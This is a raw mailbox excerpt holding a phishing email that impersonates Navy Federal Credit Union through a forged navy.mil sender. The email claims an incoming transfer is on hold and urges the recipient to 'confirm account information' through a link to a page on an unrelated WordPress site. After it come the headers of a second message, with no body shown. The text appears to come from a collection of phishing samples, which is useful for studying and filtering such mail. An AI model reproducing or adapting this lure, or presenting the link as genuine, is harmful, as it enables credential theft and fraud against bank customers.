From: "Navy Federal Credit Union"<Navy.Federal.Services@navy.mil>
To: jose@monkey.org
Subject: Incoming Funds Transfer Confirmation Alert
Date: 03 May 2017 10:19:52 -0700
Message-ID: <20170503101952.C872894F7D057AA2@navy.mil>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Status: O
X-Status: 
X-Keywords:                  
X-UID: 167

Dear Customer,
<p>
You have received a money transfer from another Navy Federal Credit Union c=
ustomer,<br>
your payment has been temporarily placed on hold for account ownership conf=
irmation.<br>
We do this to verify that funds transferred are being sent to the rightful =
owner.<br>=20
To receive your payment, kindly confirm your account information below.<br>=

<p>
<p><a href=3D"https://ayhans.net/wp-includes/directory/online/account/com.h=
tm">Click Here To Receive Payment</a></p>
<p>
<p>N.B: Your payment will be available in your account 24 - 48 hours after =
account confirmation.<br>
Thank you,<br>
Navy Federal Credit Union

From jose@monkey.org Fri May  5 19:59:45 2017 +0000
Return-Path: mbozarth@co.burlington.nj.us
Delivered-To: jose@monkey.org
X-FDA: 72806565930.07.stop38_3805c1d949e4f
X-Spam-Summary: 20,0,0,09c68410abce2d45,d41d8cd98f00b204,mbozarth@co.burlington.nj.us,:info@mail.com,RULES_HIT:10:41:72:355:379:582:960:962:966:967:973:978:983:988:989:1021:1029:1152:1189:1190:1208:1221:1252:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1542:1575:1588:1589:1592:1594:1691:1711:1730:1777:1792:2196:2199:2525:2526:2527:2528:2559:2564:2682:2685:2693:2859:2892:2895:2900:2902:2917:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4048:4119:4321:4379:4385:5007:6117:6261:6653:6658:6675:6678:7688:7903:8603:8885:8957:9025:9059:9388:9411:9868:10004:10026:10044:10049:10215:10346:10400:10919:11527:11656:11658:11914:12043:12050:12438:12519:12661:12895:13139:13161:13163:13229:13237:13439:14093:14096:14149:14181:14659:14721:14885:21080:21326:21433:21444:21451:21499:21627:30021:30022:30037:30052:30054:30070:30075:30083:3009
X-HE-Tag: stop38_3805c1d949e4f
X-Filterd-Recvd-Size: 8385
Received: from gcc01-dm2-obe.outbound.protection.outlook.com (mail-dm2gcc01hn0213.outbound.protection.outlook.com [23.103.201.213])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  5 May 2017 19:59:44 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
 d=burlco.onmicrosoft.com; s=selector1-co-burlington-nj-us;
 h=From:Date:Subject:Message-ID:Content-Type:MIME-Version;
 bh=8+Q8eF5UUuvTuwdZ9Eei8pNVOPJHT7cIAY4TnKBRvzQ=;
 b=aZRsdqjhEu66lJfzBSDPUpXrHJz9NMUQjFIn8PGeYwk7AEv9itLwPwllp3gAu8ZwoJqh7HNV6u/Oqkhm4z8QnB0HuYzZ0ChSDXfMSmxUIl3DU8ewByJ8WSYTnDctnOJMmTPh9TZuDMCrE6a4sDe8Usd7YzTh2MVhsTXhwh/hH6Y=
Received: from DM2PR09MB0543.namprd09.prod.outlook.com (10.161.252.153) by
 DM2PR09MB0543.namprd09.prod.outlook.com (10.161.252.153) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id
 15.1.1075.11; Fri, 5 May 2017 19:59:33 +0000
Received: from DM2PR09MB0543.namprd09.prod.outlook.com ([10.161.252.153]) by
 DM2PR09MB0543.namprd09.prod.outlook.com ([10.161.252.153]) with mapi id
 15.01.1075.010; Fri, 5 May 2017 19:59:33 +0000
